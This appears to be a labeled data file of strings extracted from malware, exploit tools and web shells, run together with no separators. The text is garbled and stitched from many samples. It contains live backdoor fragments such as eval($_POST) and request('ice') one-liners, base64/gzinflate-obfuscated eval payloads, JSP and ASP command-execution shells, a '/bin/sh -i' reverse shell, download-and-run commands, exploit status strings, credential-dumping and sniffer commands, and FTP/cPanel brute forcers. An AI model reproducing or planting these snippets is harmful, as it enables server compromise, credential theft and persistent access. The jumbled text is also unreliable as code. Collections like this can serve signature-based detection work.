1 dllaspxspyiis spyprotected void dgcow(object sender,eventargs e)openmydoorinstall service errorstart remove servicendisversionunable to alloc the adapter!wait for master fuckxx.exe <host> <port>chkroot2007door is bind on %smicrosoft.exchange.clients.auth.dlldllshellexc2010users\\ljw\\documentsplease input pathauth.owa\\dnstunclient\\\\t-dnstunnel\\xssok.blogspotdnstunclientbecause of error, can not analysiscan not deal witn the errorthe other retun one rstcoversation produce one errorprogram try to use the have deleted the bufferefh3 [hex] [srcfile] [dstfile]123.exe 123.efhencoder: b[i]: = (luid error)users\\k8team\\desktop\\getpassworddebug x64\\getpassword.pdbgetuserinfo usernamejoe@joeware.netif . specified for userid,game over good luck by windreleicenamejingtisanmenxiachuanxiao.vbswinds updategtalklite.comcomputer=%s&lanip=%s&uid=%s&os=%s&data=%sd13idmadmerror: peeknamedpipe failed with %i.dllut.exeut.urlutlisten socket error.wsaasyncselect socket error.new socketinfo error!http/1.1 403 forbiddencreate socket error.this service can't be stoped.provides support for media palyercreaetprocess error%4.2f gbdos emluator ver\\pipe\\fastdosfastdos.cppfail,error code = %d.safeproxy htservertimer quit!useage: %s pid%s port[%d] to port[%d] success!p0: port for listener\\users\\whg\\desktop\\plug\\[+y] cwnd : %3d, fligth:\\unitfrmmanagerkeylog.pas\\unitfrmmanagerregister.pasinput name...new value#tthreadrcontrol.execute seh!!!\\unitfrmrcontrol.pasonsocket(event is error)!make 3f version ok!!!pelease do not change the docamentpress [ok] continue run, press [cancel] exitfail to load lsasrvuser principalring rat exception(can not update server recently)!sucess!user canceled!temp result file , change it to where you likeby. 
twi1ight[both mode] ,delay time to read resultsuch as nc.exe or trojan+++shell mode+++win2008 fso has no privilege to delete filednstunclient -d or -domain <domain>dnstunclient -ip <server ip address>c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"\\microsoft\\windows\\pla\\system\\microsoft windows\" /tr c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"microsoft windows\" /tr taskkill /im conime.exe\\dns control\\t-dnstunnel\\dnstunclient\\dnstunclient.cppudp error:can not bing the port(if there is unclosed the bind process?)use error domain,set domain pls use -d or -domain mark(current: %s,recv %s)error: packet num error.the connection have condurt,pls try latercoversation produce one error:%s,coversation failtry to add many same pipe to select group(or mark is too easy).a
1 tinyzbot.properties.resources.resourcesaoao watermarkrun_a_exenetscp.exeget_mainmodule_webreference_defaultwsremove_checkfilemd5completedhttp://tempuri.org/zhoupin_cleavergetshadyprocessgetsystemantivirusesantivirusdetectorcom+ system extentionscsext.execom_extentions_binkill command is in last machine, going backmessage data length in b64: %d bytesmimikatzwrapperget_mimikatzlast_time=00/00/0000:00:00pm$if %%errorlevel%% == 1 goto linen
1 [-] failed to mmap file: %s[!] value has size of 0!forceprismheader[+] looking for vulnerable socketcan't use 32-bit exploit on 64-bit target[+] %s socket ready, exploiting...[!] nothing looks vulnerable, trying everythingkernel has 4g/4g split, not exploitable[+] kernel stack size is %d[-] failed to prepare payload!shellcodestartoffset[*] waiting for authcode from exploit[-] connection closed by remote host (tcp ack/fin)[!]warning: error on first request - path size may actually be larger than indicated.<http://%s/%s> (not <locktoken:write1>) <http://%s/>[+] target is %s[-] error appending shellcode buffer[-] shellcode is too big[+] exploit payload sent![+] bound to dimsvc, sending exploit request to opnum 29[+] connected to target %s:%d[-] build_exploit_run_x64():[%s] - error upgraded dll architecture does not match target architecture (0x%x)[%s] - error building dll loading shellcode[+] shellcode callback %s:%d[+] exploiting target[+] ping returned target architecture: %s - xor key: 0x%08x[.] sending shellcode to inject dll[-] error setting shellcodefile name[-] unable to connect to broswer named pipe, target is not vulnerable[-] unable to bind to dimsvc rpc syntax, target is not vulnerable[+] bound to dimsvc, target is vulnerable[+] target is vulnerable to %d exploit%s[!] a vulnerable target will not respond.[-] target not vulernable[-] touching the target failed![-] os fingerprint not complete - 0x%08x![*] failed to detect os / service pack on %s:%d[*] smb string: %s (%s)[-] get remotemoftriggerpath error[-] %s - target might not be in a usable state.[*] exploiting target[-] encoding exploit payload failed![-] the target is not vulnerable[+] the target is vulnerable[-] are you being redirectect? need to retarget?[+] iis target os: %s[*] summary: %d pipes found[+] testing %d pipes[-] error on smb startup, aborting92a761c29b946aa458876ff78375e0e28bc8acb0h
1 cmd=getload&login=&run=ok&run=fail&removed=ok[iisend=0x%08x][recv:] 0x%08x %siiscmd error:%dnot support this function!imgurl=http://%s/%04d-%02d/%04d%02d%02d%02d%02d%02d.png&w=800&h=600&ei=png&w=800&h=600&ei=cnjcucsbl4rfkqx444hycw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty={\\rtf1\\ansi\\ansicpg936\\uc2\\deff0\\stshfdbch13\\stshfloch0\\{\\*\\panose 02020603050405020304}times new roman
1 accessories\\wordpad.exegorillanation.combefore editing the content of a cookie, you should close all windows of internethttp://nirsoft.cjb.neta
1 software\\haoqiang\\redirect sport remotehost rport -->port redirectorhttp://ip/a.exe a.exe -->download a filestopsniffer -->stop pass snifferterminalport port -->set new terminal portexample: http://12.12.12.12/a.exe abc.execreate password sniffering thread successfully. status:loggingstartsniffer nic -->start sniffershell -->get a shelldeleteservice servicename -->delete a servicedisconnect threadnumber|all -->disconnect othersonline -->list all connected ipexample: set reg_sz test trojan.exeexecute program -->execute a programreboot -->reboot the systempassword sniffering is not runningprocess child = runtime.getruntime().exec(inputstream in = child.getinputstream();string cmd = request.getparameter(\"while ((c = in.read()) != -1) {<%@ page import=\"java.io.*\" %>r
1 __getmainargsws2_32.dllwininet.dllfreesidtoasciiredirect sport remotehost rport -->port redirectorpost /scripts/wwpmsg.dll http/1.0http://ip/a.exe a.exe -->download a filehost: wwp.mirabilis.com:80%s -set port portnumber -->set the service portshell -->get a shelldeleteservice servicename -->delete a servicegetting the username(%c%s%c)-->id(0x%s) successfully%s -set servicename servicename -->set the service name[validaterange(1, 65535)]$client = new-object -typename system.net.sockets.tcpclient$buffer = new-object -typename system.byte[] -argumentlist $client.receivebuffersizei
1 neolite executable file compressorie686@sohu.comsplitjoin.exesplitjoin<meta http-equiv=\"content-type\" content=\"text/html;charset=gb_2312-80\">set thisfile = fs.getfile(whichfile)if request.cookies(\"password\")=\"juchen\" then set thisfile = fs.opentextfile(whichfile, 1, false)color: rgb(255,0,0); text-decoration: underline }if request(\"creat\")<>\"yes\" then<form name=\"formpst\" method=\"post\" action=\"entice.asp\">if left(trim(request(\"sqllanguage\")),6)=\"select\" thenconndb.execute(sqllanguage)<!--#include file=sqlconn.asp-->rstsql=\"select * from \"&rstable(\"table_name\") -s - outbound connection source port numberfpipeto open registryi love candy very much!!ginadllh
1 dgmnoep/%s%s%s/?%s=control panel\\dehttps=https://%snetwork.proxy.ht2http=http://%s:%control panel\\denetwork.proxy.ht&ol1ms9c
1 # exc: httpsender - cannot create post channel!# exc: httpsender - cannot create get channel!#ext_5 cannot create extchanneltoprocessthread!#ext_4 cannot create extchanneltoprocessthread!#exc_2 cannot create proctoext pipe!#exc_1 cannot create exttoproc pipe!#ext_3 cannot create process!<
1 ' *** written by tim medin <tim@counterhack.com>response.binarywrite(stream.read)response.write(response.status & request.servervariables(\"remote_addr\"))%><a href=\"<%=request.servervariables(\"url\")%>\">web root</a><br/><%set folder = fso.getfolder(path)set file = fso.getfile(filepath)if ($_server[\"remote_addr\"] == $ip)header(\"http/1.0 404 not found\");<?php echo exec('killall nc');?><title>laudanum kill nc</title>foreach ($allowedips as $ip) {<form action=\"shell.asp\" method=\"post\" name=\"shell\">%comspec% /c dirset objcmd = wshell.exec(cmd)server.scripttimeout = 180cmd = request.form(\"cmd\")' *** http://laudanum.secureideas.netdim wshell, intreturn, strpresultport: <input name=\"port\" type=\"text\" value=\"8888\"><li>reverse shell - <li><a href=\"<?php echo plugins_url('file.php', __file__);?>\">file browser</a>'response.write \"<br/> -value:\" & request.querystring(key)(j)q = q & \"&\" & key & \"=\" & request.querystring(key)(j)for each i in split(http.getallresponseheaders, vblf)'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)s = urlscheme & urlhost & urlport & urlpathset http = server.createobject(\"microsoft.xmlhttp\")executable: <input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br><cfif ( #suppliedcode# neq secretcode )><cfif isdefined(\"form.cmd\")>remoteip = httpcontext.current.request.headers[\"x-forwarded-for\"].split(newremoteip = request.userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? 
$_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . 
urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], 
$_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . 
$dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" 
value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . 
$_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' 
- antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? 
eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! 
<br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. 
x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? 
$_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . 
